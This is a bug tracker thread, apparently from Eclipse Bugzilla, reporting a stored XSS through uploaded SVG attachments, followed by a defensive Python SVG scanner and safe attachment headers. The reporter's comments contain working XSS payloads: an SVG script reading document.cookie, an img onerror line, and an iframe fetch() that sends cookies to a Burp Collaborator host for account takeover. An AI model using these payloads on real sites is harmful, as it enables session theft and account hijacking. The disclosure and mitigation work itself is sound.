| Field | Value | Field | Value |
|---|---|---|---|
| Summary: | Stored Cross site scripting attack | | |
| Product: | Community | Reporter: | Manojkumar J <bughunter.mk> |
| Component: | Website | Assignee: | phoenix.ui <phoenix.ui-inbox> |
| Status: | CLOSED DUPLICATE | QA Contact: | |
| Severity: | critical | | |
| Priority: | P3 | CC: | denis.roy, wayne.beaton, webmaster |
| Version: | unspecified | | |
| Target Milestone: | --- | | |
| Hardware: | PC | | |
| OS: | Windows 10 | | |
| Whiteboard: | | | |
| Attachments: | | | |
Here is the proof of concept image that has been attached. This stored XSS image file fired once the user tried to click the file or open the file. Also, we can copy the file link and send it to anyone to escalate it.

Reproduction steps:
1. Go to the Eclipse bug reporting page.
2. Create an SVG XSS image payload and upload it.
3. Submit the report and open the uploaded payload; it will fire the XSS.

Cheers!

You can see the file looks like "click to view..."; the link looks like https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227. If you open this link or open the file, it will fire the XSS. Cheers!

Here is the SVG image XSS payload script for your reproduction:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    prompt(document.cookie);
  </script>
</svg>
```

Also I am able to call the stored XSS via these links:

- https://bugs.eclipse.org/bugs/attachment.cgi?id=286227
- https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227

Please assign a CVE ID with my name as the finder. Cheers!

Hello @Wayne Beaton, thanks for updating it to P3. But it looks like P2 to me now. Also, it was possible to call it via URLs. It was uploaded on 2 sub-domains, like:

- https://bugs.eclipse.org/bugs/attachment.cgi?id=286227
- https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227

What if an RCE or reverse shell payload is used here? It gets a reverse shell. Another question: is it possible to get cookie and location hash values by sharing the links with users? Yes, if they have access, we can get the cookie or location hash values to take over the account partially or potentially. I hope you understand my point! Cheers!

So, if it is possible to take over accounts, it will be a P1 bug. Cheers!

You can see below what the possibilities of escalation look like. Stored XSS is always dangerous and will be considered a high vulnerability. Here, the stored XSS was an image, which is held or uploaded on 2 domains. As an attacker I am able to call the stored XSS image via both domain URLs, which are below:

- https://bugs.eclipse.org/bugs/attachment.cgi?id=286227
- https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227

Now, what the attacker does is escalate to RCE or a reverse shell or account takeover, if it is possible. So, as I said, the account takeover move is very simple. We can call the stored XSS image via the 2 domain URLs, right? So, simply modify our SVG XSS payload like below:

```
<iframe %00 src= javascript:fetch(\"//XXXXXXXXXXXXXXXXXXXXXXXXXXXXX.burpcollaborator.net/?param=\"+document.cookie) %00>
```

It will send anyone's cookie value to my lovely Burp Suite proxy. What does it contain? The cookie value and other key values to log in to their account. I hope you understand all the points very well now! Cheers!

Team, I tried to escalate it, but it takes more time and more effort, and it is necessary to create more test reports again and again. So it will annoy you people. I am so sorry. I hope you people understand my point. Let me stop doing it. Cheers!

This is a dupe of https://bugs.eclipse.org/bugs/show_bug.cgi?id=283232, and AFAIK by serving the attachment data from a separate domain we've done pretty much all we can to limit the risk. -M.

*** This bug has been marked as a duplicate of bug 283232 ***

> https://bugs.eclipse.org/bugs/attachment.cgi?id=286227

Confirmed that direct access to attachments on b.e.o leads to a 302.
Created attachment 286227 [details] `<img src="x" onerror="alert(1);">`

Here I have uploaded the XSS SVG image payload; it will fire the XSS attack. Cheers!
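The closing comment names the mitigation in place: attachment data is served from a separate domain. As an added example (not code from this bug report or from the Eclipse Bugzilla), here is a defender-side check in Python for the upload path: it flags SVG files carrying active content such as the `<script>` element in the payload above, and it builds the response headers a download endpoint can send so a browser treats an attachment as a file rather than rendering it. The function names and both sample SVGs are constructed for this example.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample inputs (not the page's attachment): the first mirrors the
# SVG-plus-<script> shape the report describes, the second is a plain shape.
SUSPICIOUS_SVG = """<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">prompt(document.cookie);</script>
</svg>"""
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

# Elements that can run script or embed foreign content when an SVG is rendered inline.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "{http://www.w3.org/1999/xlink}href"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def find_active_content(svg_text: str) -> List[str]:
    """Return reasons this SVG could execute script; empty list means none found.
    xml.etree does not fetch external DTDs; for production use prefer defusedxml."""
    findings: List[str] = []
    for elem in ET.fromstring(svg_text).iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            if _local(attr).startswith("on"):  # onload, onerror, onclick, ...
                findings.append(f"{_local(attr)} handler on <{tag}>")
            elif attr in URL_ATTRS and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
    return findings


def attachment_headers(content_type: str) -> Dict[str, str]:
    """Headers for serving an untrusted upload: force a download, forbid MIME
    sniffing, and sandbox the document if a browser renders it anyway."""
    return {
        "Content-Type": content_type,
        "Content-Disposition": "attachment",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
```

Rejecting or quarantining any upload with a non-empty findings list, combined with the separate-domain hosting already described, keeps a stored SVG from running in the context of the main site.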